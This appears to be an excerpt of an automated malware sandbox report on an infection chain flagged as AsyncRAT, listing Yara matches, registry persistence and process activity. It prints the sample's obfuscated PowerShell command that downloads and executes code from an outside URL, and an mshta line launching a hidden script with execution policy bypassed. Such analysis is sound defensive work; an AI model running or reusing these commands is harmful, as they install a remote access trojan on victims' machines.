Source: Binary string: yDictionary`2<Module>System.IOCosturamscorlibSystem.Collections.GenericReadThreadLoadAddisAttachedInterlockedcostura.entrypointdll.pdb.compressedcostura.entrypointdll.dll.compressedSynchronizeddefaultInstancesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleget_NameGetNamerequestedAssemblyNamefullnameTypeget_Cultureset_CultureresourceCulturecultureApplicationSettingsBaseDisposeEditorBrowsableStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteTryGetValuevalueadd_AssemblyResolveFodyTest.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachget_LengthEndsWithnullCacheLockSystem.ComponentModelEntryPointDllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemresourceManMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.ConfigurationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonRunCopyToget_CultureInfoSleepAssemblyLoadersenderget_ResourceManagerResolveEventHandlerSystem.CodeDom.CompilerEnter.ctor.cctorMonitorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesReadFromEmbeddedResourcesFodyTest.Properties.Resources.resourcesDebuggingModesGetAssembliesFodyTest.PropertiesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsSettingsResolveEventArgsEqualsFormatObjectExitget_DefaultToLowerInvariantFodyTestProcessedByFodyContainsKeyget_AssemblyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyEntryIsNullOrEmpty;FodyTest.Properties.Resources source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.455396279.000001F46A6B3000.00000004.00000001.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: $costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: EntryPointDll.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: entrypointdllIcostura.entrypointdll.dll.compressedIcostura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Public\FodyTest\FodyTest\obj\Debug\FodyTest.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: omation.pdb@ source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParame", "0")
Yara detected Costura Assembly Loader
Source: Yara match File source: 27.2.RegAsm.exe.70a0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.RegAsm.exe.70a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.891602218.00000000070A0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
.NET source code contains potential unpacker
Source: 27.2.RegAsm.exe.400000.0.unpack, Client/Handle_Packet/Packet.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD03C192B2 push ebp; ret 2_2_00007FFD03C19320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C20595 pushfd ; retf 10_2_00007FFD03C205A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C272DB push ebx; iretd 10_2_00007FFD03C2731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C27EDB push ebx; ret 10_2_00007FFD03C27F1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE080A pushfd ; retf 10_2_00007FFD03CE080C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE0008 pushfd ; retf 10_2_00007FFD03CE0102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE4DBC pushad ; iretd 10_2_00007FFD03CE4DBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE4DD1 pushad ; iretd 10_2_00007FFD03CE4DD2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE076A pushfd ; retf 10_2_00007FFD03CE0772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE8B3C pushad ; iretd 10_2_00007FFD03CE8B49
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE473D push ss; iretd 10_2_00007FFD03CE473E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE00DD pushfd ; retf 10_2_00007FFD03CE0102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE8B17 pushad ; iretd 10_2_00007FFD03CE8B1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE08B9 pushfd ; retf 10_2_00007FFD03CE08E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03EE0E5C pushad ; iretd 10_2_00007FFD03EE0E5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03EE0E71 pushad ; iretd 10_2_00007FFD03EE0E72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_070623C0 push E8FFFFFFh; retf 27_2_070623C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071F8570 push edx; retn 0008h 27_2_071F85A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07240668 pushfd ; ret 27_2_07240669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_072411B8 pushad ; retf 27_2_072411C1
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll Jump to dropped file

Boot Survival:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Creates an undocumented autostart registry key
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value created or modified: HKEY_CURRENT_USER\Software\0B3678293025AA5E13BB 405813D04B53574AB8C9721795E9FD705273487C852B7F4545FB875DA09C7350
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
